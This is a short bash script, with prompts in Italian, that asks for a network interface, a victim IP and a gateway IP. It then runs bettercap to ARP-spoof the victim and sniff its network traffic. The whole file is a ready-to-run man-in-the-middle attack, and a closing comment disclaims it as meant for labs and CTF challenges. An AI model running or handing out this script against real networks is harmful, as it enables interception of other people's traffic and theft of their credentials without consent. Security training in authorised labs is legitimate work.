#!/bin/bash

read -p "Inserisci il nome dell'interfaccia di rete: " iface
read -p " Inserisci l'IP della vittima: " victim
read -p " Inserisci l'IP del gateway/router: " router

echo "    Interfaccia: $iface"
echo "    Vittima:     $victim"
echo "    Gateway:     $router"

sudo bettercap -iface "$iface" <<EOF
set arp.spoof.targets $victim
set arp.spoof.gateway $router
arp.spoof on
net.sniff on
EOF

# DISCLAIMER:
# This script is for educational and demonstration purposes only.
# It is intended to be used in controlled, legal environments such as labs or CTF challenges.
# Using Bettercap against systems you do not own or lack explicit authorization to test is illegal.
# The author is not responsible for any misuse or damage resulting from the execution of this script.
